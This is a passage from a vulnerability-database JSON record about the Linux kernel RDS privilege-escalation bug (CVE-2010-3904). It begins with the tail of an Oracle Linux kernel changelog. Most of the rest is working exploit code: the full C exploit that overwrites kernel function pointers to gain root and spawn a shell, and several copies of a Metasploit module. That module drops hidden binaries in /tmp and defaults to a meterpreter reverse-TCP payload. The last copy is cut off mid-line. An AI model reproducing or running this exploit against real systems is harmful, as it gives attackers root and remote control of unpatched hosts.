get_unmapped_area (Danny Feng) [556710] {CVE-2010-0291}\n- [mm] take arch_mmap_check into get_unmapped_area (Danny Feng) [556710] {CVE-2010-0291}\n- [mm] get rid of open-coding in ia64_brk (Danny Feng) [556710] {CVE-2010-0291}\n- [mm] unify sys_mmap* functions (Danny Feng) [556710] {CVE-2010-0291}\n- [mm] kill ancient cruft in s390 compat mmap (Danny Feng) [556710] {CVE-2010-0291}\n- [mm] fix pgoff in have to relocate case of mremap (Danny Feng) [556710] {CVE-2010-0291}\n- [mm] fix the arch checks in MREMAP_FIXED case (Danny Feng) [556710] {CVE-2010-0291}\n- [mm] fix checks for expand-in-place mremap (Danny Feng) [556710] {CVE-2010-0291}\n- [mm] add new vma_expandable helper function (Danny Feng) [556710] {CVE-2010-0291}\n- [mm] move MREMAP_FIXED into its own header (Danny Feng) [556710] {CVE-2010-0291}\n- [mm] move locating vma code and checks on it (Danny Feng) [556710] {CVE-2010-0291}\n- [iscsi] fix slow failover times (Mike Christie) [570681]\n- [misc] kernel: fix elf load DoS on x86_64 (Danny Feng) [560553] {CVE-2010-0307}\n- [netlink] connector: delete buggy notification code (Jiri Olsa) [561685] {CVE-2010-0410}\n- [sound] hda_intel: avoid divide by zero in azx devices (Jaroslav Kysela) [567172] {CVE-2010-1085}\n- [dvb] fix endless loop when decoding ULE at dvb-core (Mauro Carvalho Chehab) [569242] {CVE-2010-1086}\n- [scsi] fnic: fix tx queue handling (Mike Christie) [576709]\n- [fusion] mptsas: fix event_data alignment (Tomas Henzl) [570000]\n- [edac] fix internal error message in amd64_edac driver (Bhavna Sarathy) [569938]\n- [fs] remove unneccessary f_ep_lock from fasync_helper (Lachlan McIlroy) [567479]\n- [x86_64] fix floating point state corruption after signal (Oleg Nesterov) [560891]\n- [mm] dont let reserved memory overlap bootmem_map (Amerigo Wang) [550974]\n- [s390] kernel: correct TLB flush of page table entries (Hendrik Brueckner) [545527]\n- [xen] iommu: clear IO-APIC pins on boot and shutdown (Paolo Bonzini) [548201]\n- [xen] vtd: fix ioapic pin array (Don Dugger) [563546]\n- [xen] set hypervisor present CPUID bit (Paolo Bonzini) [573771]\n[2.6.18-194.el5]\n- [net] mlx4: pass attributes down to vlan interfaces (Doug Ledford) [573098]\n- [block] cfq-iosched: fix sequential read perf regression (Jeff Moyer) [571818]\n[2.6.18-193.el5]\n- [fs] gfs2: locking fix for potential dos (Steven Whitehouse) [572390] {CVE-2010-0727}\n- [acpi] power_meter: avoid oops on driver load (Matthew Garrett) [566575]\n- [net] r8169: fix assignments in backported net_device_ops (Ivan Vecera) [568040]\n- [net] virtio_net: refill rx buffer on out-of-memory (Herbert Xu) [554078]", "cvss3": {}, "published": "2011-01-20T00:00:00", "type": "oraclelinux", "title": "Oracle Linux 5.6 kernel security and bug fix update", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2010-0307", "CVE-2010-2942", "CVE-2010-3904", "CVE-2010-3078", "CVE-2010-2066", "CVE-2010-4081", "CVE-2010-1641", "CVE-2010-2248", "CVE-2010-4073", "CVE-2010-2226", "CVE-2010-0410", "CVE-2010-4072", "CVE-2010-0730", "CVE-2010-2492", "CVE-2010-2521", "CVE-2010-4083", "CVE-2010-1437", "CVE-2010-3859", "CVE-2010-3086", "CVE-2010-0727", "CVE-2010-1187", "CVE-2010-4080", "CVE-2010-2963", "CVE-2010-0291", "CVE-2010-4343", "CVE-2010-3877", "CVE-2010-4158", "CVE-2010-2070", "CVE-2010-2524", "CVE-2010-3296", "CVE-2010-1084", "CVE-2010-3015", "CVE-2010-2938", "CVE-2010-4247", "CVE-2010-4263", "CVE-2010-4258", "CVE-2010-3442", "CVE-2010-4243", "CVE-2010-3066", "CVE-2010-2240", "CVE-2010-1083", "CVE-2010-3081", "CVE-2010-0622", "CVE-2010-3067", "CVE-2010-3699", "CVE-2010-4238", "CVE-2010-1085", "CVE-2010-1086", "CVE-2010-1436", "CVE-2010-4255", "CVE-2010-1173", "CVE-2010-1088", "CVE-2010-1087", "CVE-2010-4075"], "modified": "2011-01-20T00:00:00", "id": "ELSA-2011-0017", "href": "http://linux.oracle.com/errata/ELSA-2011-0017.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:27", "description": "\nLinux Kernel 2.6.36-rc8 - RDS Protocol Local Privilege Escalation", "cvss3": {}, "published": "2010-10-19T00:00:00", "type": "exploitpack", "title": "Linux Kernel 2.6.36-rc8 - RDS Protocol Local Privilege Escalation", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3904"], "modified": "2010-10-19T00:00:00", "id": "EXPLOITPACK:80919A880D8F23D053A90FDF86EB8DAA", "href": "", "sourceData": "// source: http://www.vsecurity.com/resources/advisory/20101019-1/\n\n/* \n * Linux Kernel <= 2.6.36-rc8 RDS privilege escalation exploit\n * CVE-2010-3904\n * by Dan Rosenberg <drosenberg@vsecurity.com>\n *\n * Copyright 2010 Virtual Security Research, LLC\n *\n * The handling functions for sending and receiving RDS messages\n * use unchecked __copy_*_user_inatomic functions without any\n * access checks on user-provided pointers. As a result, by\n * passing a kernel address as an iovec base address in recvmsg-style\n * calls, a local user can overwrite arbitrary kernel memory, which\n * can easily be used to escalate privileges to root. Alternatively,\n * an arbitrary kernel read can be performed via sendmsg calls.\n *\n * This exploit is simple - it resolves a few kernel symbols,\n * sets the security_ops to the default structure, then overwrites\n * a function pointer (ptrace_traceme) in that structure to point\n * to the payload. After triggering the payload, the original\n * value is restored. Hard-coding the offset of this function\n * pointer is a bit inelegant, but I wanted to keep it simple and\n * architecture-independent (i.e. no inline assembly).\n *\n * The vulnerability is yet another example of why you shouldn't\n * allow loading of random packet families unless you actually\n * need them.\n *\n * Greets to spender, kees, taviso, hawkes, team lollerskaters,\n * joberheide, bla, sts, and VSR\n *\n */\n\n\n#include <stdio.h>\n#include <unistd.h>\n#include <stdlib.h>\n#include <fcntl.h>\n#include <sys/types.h>\n#include <sys/socket.h>\n#include <netinet/in.h>\n#include <errno.h>\n#include <string.h>\n#include <sys/ptrace.h>\n#include <sys/utsname.h>\n\n#define RECVPORT 5555 \n#define SENDPORT 6666\n\nint prep_sock(int port)\n{\n\t\n\tint s, ret;\n\tstruct sockaddr_in addr;\n\n\ts = socket(PF_RDS, SOCK_SEQPACKET, 0);\n\n\tif(s < 0) {\n\t\tprintf(\"[*] Could not open socket.\\n\");\n\t\texit(-1);\n\t}\n\t\n\tmemset(&addr, 0, sizeof(addr));\n\n\taddr.sin_addr.s_addr = inet_addr(\"127.0.0.1\");\n\taddr.sin_family = AF_INET;\n\taddr.sin_port = htons(port);\n\n\tret = bind(s, (struct sockaddr *)&addr, sizeof(addr));\n\n\tif(ret < 0) {\n\t\tprintf(\"[*] Could not bind socket.\\n\");\n\t\texit(-1);\n\t}\n\n\treturn s;\n\n}\n\nvoid get_message(unsigned long address, int sock)\n{\n\n\trecvfrom(sock, (void *)address, sizeof(void *), 0,\n\t\t NULL, NULL);\n\n}\n\nvoid send_message(unsigned long value, int sock)\n{\n\t\n\tint size, ret;\n\tstruct sockaddr_in recvaddr;\n\tstruct msghdr msg;\n\tstruct iovec iov;\n\tunsigned long buf;\n\t\n\tmemset(&recvaddr, 0, sizeof(recvaddr));\n\n\tsize = sizeof(recvaddr);\n\n\trecvaddr.sin_port = htons(RECVPORT);\n\trecvaddr.sin_family = AF_INET;\n\trecvaddr.sin_addr.s_addr = inet_addr(\"127.0.0.1\");\n\n\tmemset(&msg, 0, sizeof(msg));\n\t\n\tmsg.msg_name = &recvaddr;\n\tmsg.msg_namelen = sizeof(recvaddr);\n\tmsg.msg_iovlen = 1;\n\t\n\tbuf = value;\n\n\tiov.iov_len = sizeof(buf);\n\tiov.iov_base = &buf;\n\n\tmsg.msg_iov = &iov;\n\n\tret = sendmsg(sock, &msg, 0);\n\tif(ret < 0) {\n\t\tprintf(\"[*] Something went wrong sending.\\n\");\n\t\texit(-1);\n\t}\n}\n\nvoid write_to_mem(unsigned long addr, unsigned long value, int sendsock, int recvsock)\n{\n\n\tif(!fork()) {\n\t\t\tsleep(1);\n\t\t\tsend_message(value, sendsock);\n\t\t\texit(1);\n\t}\n\telse {\n\t\tget_message(addr, recvsock);\n\t\twait(NULL);\n\t}\n\n}\n\ntypedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);\ntypedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);\n_commit_creds commit_creds;\n_prepare_kernel_cred prepare_kernel_cred;\n\nint __attribute__((regparm(3)))\ngetroot(void * file, void * vma)\n{\n\n\tcommit_creds(prepare_kernel_cred(0));\n\treturn -1;\t\n\n}\n\n/* thanks spender... */\nunsigned long get_kernel_sym(char *name)\n{\n\tFILE *f;\n\tunsigned long addr;\n\tchar dummy;\n\tchar sname[512];\n\tstruct utsname ver;\n\tint ret;\n\tint rep = 0;\n\tint oldstyle = 0;\n\n\tf = fopen(\"/proc/kallsyms\", \"r\");\n\tif (f == NULL) {\n\t\tf = fopen(\"/proc/ksyms\", \"r\");\n\t\tif (f == NULL)\n\t\t\tgoto fallback;\n\t\toldstyle = 1;\n\t}\n\nrepeat:\n\tret = 0;\n\twhile(ret != EOF) {\n\t\tif (!oldstyle)\n\t\t\tret = fscanf(f, \"%p %c %s\\n\", (void **)&addr, &dummy, sname);\n\t\telse {\n\t\t\tret = fscanf(f, \"%p %s\\n\", (void **)&addr, sname);\n\t\t\tif (ret == 2) {\n\t\t\t\tchar *p;\n\t\t\t\tif (strstr(sname, \"_O/\") || strstr(sname, \"_S.\"))\n\t\t\t\t\tcontinue;\n\t\t\t\tp = strrchr(sname, '_');\n\t\t\t\tif (p > ((char *)sname + 5) && !strncmp(p - 3, \"smp\", 3)) {\n\t\t\t\t\tp = p - 4;\n\t\t\t\t\twhile (p > (char *)sname && *(p - 1) == '_')\n\t\t\t\t\t\tp--;\n\t\t\t\t\t*p = '\\0';\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\tif (ret == 0) {\n\t\t\tfscanf(f, \"%s\\n\", sname);\n\t\t\tcontinue;\n\t\t}\n\t\tif (!strcmp(name, sname)) {\n\t\t\tfprintf(stdout, \" [+] Resolved %s to %p%s\\n\", name, (void *)addr, rep ? \" (via System.map)\" : \"\");\n\t\t\tfclose(f);\n\t\t\treturn addr;\n\t\t}\n\t}\n\n\tfclose(f);\n\tif (rep)\n\t\treturn 0;\nfallback:\n\t/* didn't find the symbol, let's retry with the System.map\n\t dedicated to the pointlessness of Russell Coker's SELinux\n\t test machine (why does he keep upgrading the kernel if\n\t \"all necessary security can be provided by SE Linux\"?)\n\t*/\n\tuname(&ver);\n\tif (strncmp(ver.release, \"2.6\", 3))\n\t\toldstyle = 1;\n\tsprintf(sname, \"/boot/System.map-%s\", ver.release);\n\tf = fopen(sname, \"r\");\n\tif (f == NULL)\n\t\treturn 0;\n\trep = 1;\n\tgoto repeat;\n}\n\nint main(int argc, char * argv[])\n{\n\tunsigned long sec_ops, def_ops, cap_ptrace, target;\n\tint sendsock, recvsock;\n\tstruct utsname ver;\n\n\tprintf(\"[*] Linux kernel >= 2.6.30 RDS socket exploit\\n\");\n\tprintf(\"[*] by Dan Rosenberg\\n\");\n\n\tuname(&ver);\n\n\tif(strncmp(ver.release, \"2.6.3\", 5)) {\n\t\tprintf(\"[*] Your kernel is not vulnerable.\\n\");\n\t\treturn -1;\n\t}\t\n\n\t/* Resolve addresses of relevant symbols */\n\tprintf(\"[*] Resolving kernel addresses...\\n\");\n\tsec_ops = get_kernel_sym(\"security_ops\");\n\tdef_ops = get_kernel_sym(\"default_security_ops\");\n\tcap_ptrace = get_kernel_sym(\"cap_ptrace_traceme\");\n\tcommit_creds = (_commit_creds) get_kernel_sym(\"commit_creds\");\n\tprepare_kernel_cred = (_prepare_kernel_cred) get_kernel_sym(\"prepare_kernel_cred\");\n\n\tif(!sec_ops || !def_ops || !cap_ptrace || !commit_creds || !prepare_kernel_cred) {\n\t\tprintf(\"[*] Failed to resolve kernel symbols.\\n\");\n\t\treturn -1;\n\t}\n\n\t/* Calculate target */\n\ttarget = def_ops + sizeof(void *) + ((11 + sizeof(void *)) & ~(sizeof(void *) - 1));\n\n\tsendsock = prep_sock(SENDPORT);\n\trecvsock = prep_sock(RECVPORT);\n\n\t/* Reset security ops */\n\tprintf(\"[*] Overwriting security ops...\\n\");\n\twrite_to_mem(sec_ops, def_ops, sendsock, recvsock);\n\n\t/* Overwrite ptrace_traceme security op fptr */\n\tprintf(\"[*] Overwriting function pointer...\\n\");\n\twrite_to_mem(target, (unsigned long)&getroot, sendsock, recvsock);\n\n\t/* Trigger the payload */\n\tprintf(\"[*] Triggering payload...\\n\");\n\tptrace(PTRACE_TRACEME, 1, NULL, NULL);\n\t\n\t/* Restore the ptrace_traceme security op */\n\tprintf(\"[*] Restoring function pointer...\\n\");\n\twrite_to_mem(target, cap_ptrace, sendsock, recvsock);\n\n\tif(getuid()) {\n\t\tprintf(\"[*] Exploit failed to get root.\\n\");\n\t\treturn -1;\n\t}\n\n\tprintf(\"[*] Got root!\\n\");\n\texecl(\"/bin/sh\", \"sh\", NULL);\n\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2018-05-19T17:55:35", "description": "", "cvss3": {}, "published": "2018-05-19T00:00:00", "type": "packetstorm", "title": "Reliable Datagram Sockets (RDS) Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2010-3904"], "modified": "2018-05-19T00:00:00", "id": "PACKETSTORM:147703", "href": "https://packetstormsecurity.com/files/147703/Reliable-Datagram-Sockets-RDS-Privilege-Escalation.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Local \nRank = GreatRanking \n \ninclude Msf::Post::File \ninclude Msf::Post::Linux::Priv \ninclude Msf::Post::Linux::System \ninclude Msf::Post::Linux::Kernel \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Reliable Datagram Sockets (RDS) Privilege Escalation', \n'Description' => %q{ \nThis module exploits a vulnerability in the rds_page_copy_user function \nin net/rds/page.c (RDS) in Linux kernel versions 2.6.30 to 2.6.36-rc8 \nto execute code as root (CVE-2010-3904). \n \nThis module has been tested successfully on Fedora 13 (i686) with \nkernel version 2.6.33.3-85.fc13.i686.PAE and Ubuntu 10.04 (x86_64) \nwith kernel version 2.6.32-21-generic. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Dan Rosenberg', # Discovery and C exploit \n'Brendan Coles' # Metasploit \n], \n'DisclosureDate' => 'Oct 20 2010', \n'Platform' => [ 'linux' ], \n'Arch' => [ ARCH_X86, ARCH_X64 ], \n'SessionTypes' => [ 'shell', 'meterpreter' ], \n'Targets' => [[ 'Auto', {} ]], \n'Privileged' => true, \n'References' => \n[ \n[ 'AKA', 'rds-fail.c' ], \n[ 'EDB', '15285' ], \n[ 'CVE', '2010-3904' ], \n[ 'BID', '44219' ], \n[ 'URL', 'https://securitytracker.com/id?1024613' ], \n[ 'URL', 'https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=799c10559d60f159ab2232203f222f18fa3c4a5f' ], \n[ 'URL', 'http://vulnfactory.org/exploits/rds-fail.c' ], \n[ 'URL', 'http://web.archive.org/web/20101020044047/http://www.vsecurity.com/resources/advisory/20101019-1/' ], \n[ 'URL', 'http://web.archive.org/web/20101020044048/http://www.vsecurity.com/download/tools/linux-rds-exploit.c' ], \n], \n'DefaultOptions' => \n{ \n'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp', \n'WfsDelay' => 10, \n'PrependFork' => true \n}, \n'DefaultTarget' => 0)) \nregister_options [ \nOptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', %w(Auto True False) ]), \nOptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]), \n] \nend \n \ndef base_dir \ndatastore['WritableDir'].to_s \nend \n \ndef modules_disabled? \nmodules_disabled = cmd_exec('cat /proc/sys/kernel/modules_disabled').to_s.strip \n(modules_disabled.eql?('1') || modules_disabled.eql?('2')) \nend \n \ndef upload(path, data) \nprint_status \"Writing '#{path}' (#{data.size} bytes) ...\" \nrm_f path \nwrite_file path, data \nregister_file_for_cleanup path \nend \n \ndef upload_and_chmodx(path, data) \nupload path, data \ncmd_exec \"chmod +x '#{path}'\" \nend \n \ndef upload_and_compile(path, data) \nupload \"#{path}.c\", data \noutput = cmd_exec \"gcc -o #{path} #{path}.c\" \n \nunless output.blank? \nprint_error output \nfail_with Failure::Unknown, \"#{path}.c failed to compile\" \nend \n \ncmd_exec \"chmod +x #{path}\" \nregister_file_for_cleanup path \nend \n \ndef exploit_data(file) \npath = ::File.join Msf::Config.data_directory, 'exploits', 'cve-2010-3904', file \nfd = ::File.open path, 'rb' \ndata = fd.read fd.stat.size \nfd.close \ndata \nend \n \ndef live_compile? \nreturn false unless datastore['COMPILE'].eql?('Auto') || datastore['COMPILE'].eql?('True') \n \nif has_gcc? \nvprint_good 'gcc is installed' \nreturn true \nend \n \nunless datastore['COMPILE'].eql? 'Auto' \nfail_with Failure::BadConfig, 'gcc is not installed. Compiling will fail.' \nend \nend \n \ndef check \nversion = kernel_release \nunless Gem::Version.new(version.split('-').first) >= Gem::Version.new('2.6.30') && \nGem::Version.new(version.split('-').first) < Gem::Version.new('2.6.37') \nvprint_error \"Linux kernel version #{version} is not vulnerable\" \nreturn CheckCode::Safe \nend \nvprint_good \"Linux kernel version #{version} appears to be vulnerable\" \n \nunless cmd_exec('/sbin/modinfo rds').to_s.include? 'Reliable Datagram Sockets' \nvprint_error 'RDS kernel module is not available' \nreturn CheckCode::Safe \nend \nvprint_good 'RDS kernel module is available' \n \nif modules_disabled? \nunless cmd_exec('/sbin/lsmod').to_s.include? 'rds' \nvprint_error 'RDS kernel module is not loadable' \nreturn CheckCode::Safe \nend \nend \nvprint_good 'RDS kernel module is loadable' \n \nCheckCode::Appears \nend \n \ndef exploit \nunless check == CheckCode::Appears \nfail_with Failure::NotVulnerable, 'Target is not vulnerable' \nend \n \nif is_root? \nfail_with Failure::BadConfig, 'Session already has root privileges' \nend \n \nunless cmd_exec(\"test -w '#{base_dir}' && echo true\").include? 'true' \nfail_with Failure::BadConfig, \"#{base_dir} is not writable\" \nend \n \n# Upload exploit executable \nexecutable_name = \".#{rand_text_alphanumeric rand(5..10)}\" \nexecutable_path = \"#{base_dir}/#{executable_name}\" \nif live_compile? \nvprint_status 'Live compiling exploit on system...' \nupload_and_compile executable_path, exploit_data('rds-fail.c') \nelse \nvprint_status 'Dropping pre-compiled exploit on system...' \narch = kernel_hardware \ncase arch \nwhen /amd64|ia64|x86_64|x64/i \nupload_and_chmodx executable_path, exploit_data('rds-fail.x64') \nwhen /x86|i[3456]86/ \nupload_and_chmodx executable_path, exploit_data('rds-fail.x86') \nelse \nfail_with Failure::NoTarget, \"No pre-compiled binaries are available for system architecture: #{arch}\" \nend \nend \n \n# Upload payload executable \npayload_path = \"#{base_dir}/.#{rand_text_alphanumeric rand(5..10)}\" \nupload_and_chmodx payload_path, generate_payload_exe \n \n# Launch exploit \nprint_status 'Launching exploit...' \noutput = cmd_exec \"#{executable_path} #{payload_path}\" \noutput.each_line { |line| vprint_status line.chomp } \nend \nend \n`\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/147703/rds_priv_esc.rb.txt"}, {"lastseen": "2019-12-24T23:51:03", "description": "", "cvss3": {}, "published": "2019-12-23T00:00:00", "type": "packetstorm", "title": "vReliable Datagram Sockets (RDS) rds_page_copy_user Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2010-3904"], "modified": "2019-12-23T00:00:00", "id": "PACKETSTORM:155751", "href": "https://packetstormsecurity.com/files/155751/vReliable-Datagram-Sockets-RDS-rds_page_copy_user-Privilege-Escalation.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Local \nRank = GreatRanking \n \ninclude Msf::Post::File \ninclude Msf::Post::Linux::Priv \ninclude Msf::Post::Linux::System \ninclude Msf::Post::Linux::Kernel \ninclude Msf::Post::Linux::Compile \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::FileDropper \ninclude Msf::Module::Deprecated \n \nmoved_from 'exploit/linux/local/rds_priv_esc' \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Reliable Datagram Sockets (RDS) rds_page_copy_user Privilege Escalation', \n'Description' => %q{ \nThis module exploits a vulnerability in the `rds_page_copy_user` function \nin `net/rds/page.c` (RDS) in Linux kernel versions 2.6.30 to 2.6.36-rc8 \nto execute code as root (CVE-2010-3904). \n \nThis module has been tested successfully on: \n \nFedora 13 (i686) kernel version 2.6.33.3-85.fc13.i686.PAE; and \nUbuntu 10.04 (x86_64) with kernel version 2.6.32-21-generic. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Dan Rosenberg', # Discovery and C exploit \n'bcoles' # Metasploit \n], \n'DisclosureDate' => 'Oct 20 2010', \n'Platform' => [ 'linux' ], \n'Arch' => [ ARCH_X86, ARCH_X64 ], \n'SessionTypes' => [ 'shell', 'meterpreter' ], \n'Targets' => [[ 'Auto', {} ]], \n'Privileged' => true, \n'References' => \n[ \n[ 'EDB', '15285' ], \n[ 'CVE', '2010-3904' ], \n[ 'BID', '44219' ], \n[ 'URL', 'https://securitytracker.com/id?1024613' ], \n[ 'URL', 'https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=799c10559d60f159ab2232203f222f18fa3c4a5f' ], \n[ 'URL', 'http://vulnfactory.org/exploits/rds-fail.c' ], \n[ 'URL', 'http://web.archive.org/web/20101020044047/http://www.vsecurity.com/resources/advisory/20101019-1/' ], \n[ 'URL', 'http://web.archive.org/web/20101020044048/http://www.vsecurity.com/download/tools/linux-rds-exploit.c' ], \n], \n'DefaultOptions' => \n{ \n'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp', \n'WfsDelay' => 10, \n'PrependFork' => true \n}, \n'Notes' => \n{ \n'AKA' => ['rds-fail.c'], \n'Reliability' => [ UNRELIABLE_SESSION ], \n'Stability' => [ CRASH_SAFE ], \n'SideEffects' => [ ARTIFACTS_ON_DISK ] \n}, \n'DefaultTarget' => 0)) \nregister_advanced_options [ \nOptBool.new('ForceExploit', [ false, 'Override check result', false ]), \nOptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]) \n] \nend \n \ndef base_dir \ndatastore['WritableDir'].to_s \nend \n \ndef modules_disabled? \nmodules_disabled = cmd_exec('cat /proc/sys/kernel/modules_disabled').to_s.strip \n(modules_disabled.eql?('1') || modules_disabled.eql?('2')) \nend \n \ndef upload(path, data) \nprint_status \"Writing '#{path}' (#{data.size} bytes) ...\" \nrm_f path \nwrite_file path, data \nregister_file_for_cleanup path \nend \n \ndef check \nversion = kernel_release \nunless Gem::Version.new(version.split('-').first) >= Gem::Version.new('2.6.30') && \nGem::Version.new(version.split('-').first) < Gem::Version.new('2.6.37') \nreturn CheckCode::Safe(\"Linux kernel version #{version} is not vulnerable\") \nend \nvprint_good \"Linux kernel version #{version} appears to be vulnerable\" \n \nunless cmd_exec('/sbin/modinfo rds').to_s.include? 'Reliable Datagram Sockets' \nreturn CheckCode::Safe('RDS kernel module is not available') \nend \nvprint_good 'RDS kernel module is available' \n \nif modules_disabled? \nunless cmd_exec('/sbin/lsmod').to_s.include? 'rds' \nreturn CheckCode::Safe('RDS kernel module is not loadable') \nend \nend \nvprint_good 'RDS kernel module is loadable' \n \nCheckCode::Appears \nend \n \ndef exploit \nunless check == CheckCode::Appears \nunless datastore['ForceExploit'] \nfail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.' \nend \nprint_warning 'Target does not appear to be vulnerable' \nend \n \nif is_root? \nunless datastore['ForceExploit'] \nfail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.' \nend \nend \n \nunless writable? base_dir \nfail_with Failure::BadConfig, \"#{base_dir} is not writable\" \nend \n \nexecutable_path = \"#{base_dir}/.#{rand_text_alphanumeric(5..10)}\" \n \nif live_compile? \nvprint_status 'Live compiling exploit on system...' \nupload_and_compile executable_path, exploit_data('cve-2010-3904', 'rds-fail.c') \nelse \nvprint_status 'Dropping pre-compiled exploit on system...' \narch = kernel_hardware \ncase arch \nwhen /amd64|ia64|x86_64|x64/i \nupload_and_chmodx executable_path, exploit_data('cve-2010-3904', 'rds-fail.x64') \nwhen /x86|i[3456]86/ \nupload_and_chmodx executable_path, exploit_data('cve-2010-3904', 'rds-fail.x86') \nelse \nfail_with Failure::NoTarget, \"No pre-compiled binaries are available for system architecture: #{arch}\" \nend \nend \n \npayload_path = \"#{base_dir}/.#{rand_text_alphanumeric(5..10)}\" \nupload_and_chmodx payload_path, generate_payload_exe \n \nprint_status 'Launching exploit...' \noutput = cmd_exec \"#{executable_path} #{payload_path}\" \noutput.each_line { |line| vprint_status line.chomp } \nend \nend \n`\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/155751/rds_rds_page_copy_user_priv_esc.rb.txt"}], "zdt": [{"lastseen": "2018-05-19T20:03:02", "description": "This Metasploit module exploits a vulnerability in the rds_page_copy_user function in net/rds/page.c (RDS) in Linux kernel versions 2.6.30 to 2.6.36-rc8 to execute code as root (CVE-2010-3904). This Metasploit module has been tested successfully on Fedora 13 (i686) with kernel version 2.6.33.3-85.fc13.i686.PAE and Ubuntu 10.04 (x86_64) with kernel version 2.6.32-21-generic.", "cvss3": {}, "published": "2018-05-19T00:00:00", "type": "zdt", "title": "Reliable Datagram Sockets (RDS) Privilege Escalation Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2010-3904"], "modified": "2018-05-19T00:00:00", "id": "1337DAY-ID-30386", "href": "https://0day.today/exploit/description/30386", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Local\r\n Rank = GreatRanking\r\n\r\n include Msf::Post::File\r\n include Msf::Post::Linux::Priv\r\n include Msf::Post::Linux::System\r\n include Msf::Post::Linux::Kernel\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Reliable Datagram Sockets (RDS) Privilege Escalation',\r\n 'Description' => %q{\r\n This module exploits a vulnerability in the rds_page_copy_user function\r\n in net/rds/page.c (RDS) in Linux kernel versions 2.6.30 to 2.6.36-rc8\r\n to execute code as root (CVE-2010-3904).\r\n\r\n This module has been tested successfully on Fedora 13 (i686) with\r\n kernel version 2.6.33.3-85.fc13.i686.PAE and Ubuntu 10.04 (x86_64)\r\n with kernel version 2.6.32-21-generic.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Dan Rosenberg', # Discovery and C exploit\r\n 'Brendan Coles' # Metasploit\r\n ],\r\n 'DisclosureDate' => 'Oct 20 2010',\r\n 'Platform' => [ 'linux' ],\r\n 'Arch' => [ ARCH_X86, ARCH_X64 ],\r\n 'SessionTypes' => [ 'shell', 'meterpreter' ],\r\n 'Targets' => [[ 'Auto', {} ]],\r\n 'Privileged' => true,\r\n 'References' =>\r\n [\r\n [ 'AKA', 'rds-fail.c' ],\r\n [ 'EDB', '15285' ],\r\n [ 'CVE', '2010-3904' ],\r\n [ 'BID', '44219' ],\r\n [ 'URL', 'https://securitytracker.com/id?1024613' ],\r\n [ 'URL', 'https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=799c10559d60f159ab2232203f222f18fa3c4a5f' ],\r\n [ 'URL', 'http://vulnfactory.org/exploits/rds-fail.c' ],\r\n [ 'URL', 'http://web.archive.org/web/20101020044047/http://www.vsecurity.com/resources/advisory/20101019-1/' ],\r\n [ 'URL', 'http://web.archive.org/web/20101020044048/http://www.vsecurity.com/download/tools/linux-rds-exploit.c' ],\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp',\r\n 'WfsDelay' => 10,\r\n 'PrependFork' => true\r\n },\r\n 'DefaultTarget' => 0))\r\n register_options [\r\n OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', %w(Auto True False) ]),\r\n OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),\r\n ]\r\n end\r\n\r\n def base_dir\r\n datastore['WritableDir'].to_s\r\n end\r\n\r\n def modules_disabled?\r\n modules_disabled = cmd_exec('cat 